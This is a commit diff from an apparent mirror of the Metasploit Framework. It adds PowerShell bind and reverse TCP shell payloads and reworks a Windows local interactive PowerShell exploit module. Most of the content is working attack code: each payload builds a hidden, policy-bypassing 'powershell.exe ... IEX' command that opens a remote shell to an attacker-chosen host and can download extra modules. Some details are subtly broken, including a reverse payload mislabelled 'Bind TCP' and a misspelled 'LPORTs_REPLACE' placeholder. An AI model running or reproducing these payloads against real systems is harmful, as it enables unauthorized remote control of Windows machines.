infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

New payloads

bug/bundler_fix
benpturner 2015-04-26 00:16:59 +01:00
parent a02ea90824
commit ded904c72c
3 changed files with 112 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

64
modules/exploits/windows/local/interactive_powershell.rb
View File

@ -1,4 +1,4 @@
1##
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
@ -7,8 +7,6 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
include Rex::Powershell::Command
def initialize(info = {})
super(update_info(info,
'Name' => "Windows Local Interactive Powershell Session",
@ -47,61 +45,37 @@ class Metasploit3 < Msf::Exploit::Local
'DefaultTarget' => 0
))
register_options(
[
Opt::LPORT(4444),
OptString.new('LOAD_MODULES', [false, 'A list of powershell modules seperated by a comma to download over the Internet', nil])
], self.class)
end
def exploit
rhost = datastore['RHOST']
lhost = datastore['LHOST']
lport = datastore['LPORT']
payload = datastore['PAYLOAD']
if datastore['RHOST'].to_s.empty?
rhost = session.session_host
else
rhost = datastore['RHOST']
# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
# Check that the payload is a Windows one and on the list
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
return
end
template_path = File.join(
Msf::Config.data_directory,
'exploits',
'powershell',
'powerfun.ps1')
script_in = File.read(template_path)
if datastore['LHOST'].to_s.empty?
script_in << "\npowerfun -Command bind"
else
lhost = datastore['LHOST']
script_in << "\npowerfun -Command reverse"
end
mods = ''
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"
end
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORT_REPLACE', lport.to_s)
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
res = session.sys.process.execute("powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})", nil, 'Hidden' => true, 'Channelized' => false)
pay = client.framework.payloads.create(payload)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
pay.datastore['RHOST'] = rhost
raw = pay.generate
res = session.sys.process.execute("#{raw}", nil, 'Hidden' => true, 'Channelized' => false)
fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
computer_name = session.sys.config.sysinfo['Computer']
vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
if datastore['LHOST'].to_s.empty?
print_status("Attemping to connect to #{rhost}:#{lport}...")
ctimeout = 30
ctimeout = 10
stime = Time.now.to_i
last_error = nil

53
modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
View File

@ -4,23 +4,28 @@
##
require 'msf/core'
require 'msf/core/handler/find_shell'
require 'msf/base/sessions/powershell'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 0
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
include Rex::Powershell::Command
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Bind Powershell, Interact with Established Connection',
'Description' => 'Interacts with a powershell session on an established socket connection',
'Author' => 'hdm',
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Listen for a connection and spawn an interactive powershell session',
'Author' =>
[
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
'Platform' => 'windows',
'Arch' => ARCH_CMD,
@ -34,6 +39,40 @@ module Metasploit3
'Payload' => ''
}
))
register_options(
[
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
end
def generate
lport = datastore['LPORT']
template_path = File.join(
Msf::Config.data_directory,
'exploits',
'powershell',
'powerfun.ps1')
script_in = File.read(template_path)
script_in << "\npowerfun -Command bind"
mods = ''
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"
end
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORTs_REPLACE', lport.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
end
end

53
modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
View File

@ -4,23 +4,28 @@
##
require 'msf/core'
require 'msf/core/handler/find_shell'
require 'msf/base/sessions/powershell'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 0
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
include Rex::Powershell::Command
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Reverse Powershell, Interact with Established Connection',
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Interacts with a powershell session on an established socket connection',
'Author' => 'hdm',
'Author' =>
[
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
'Platform' => 'windows',
'Arch' => ARCH_CMD,
@ -34,6 +39,42 @@ module Metasploit3
'Payload' => ''
}
))
register_options(
[
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
end
def generate
lport = datastore['LPORT']
lhost = datastore['LHOST']
template_path = File.join(
Msf::Config.data_directory,
'exploits',
'powershell',
'powerfun.ps1')
script_in = File.read(template_path)
script_in << "\npowerfun -Command reverse"
mods = ''
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"
end
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORT_REPLACE', lport.to_s)
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
end
end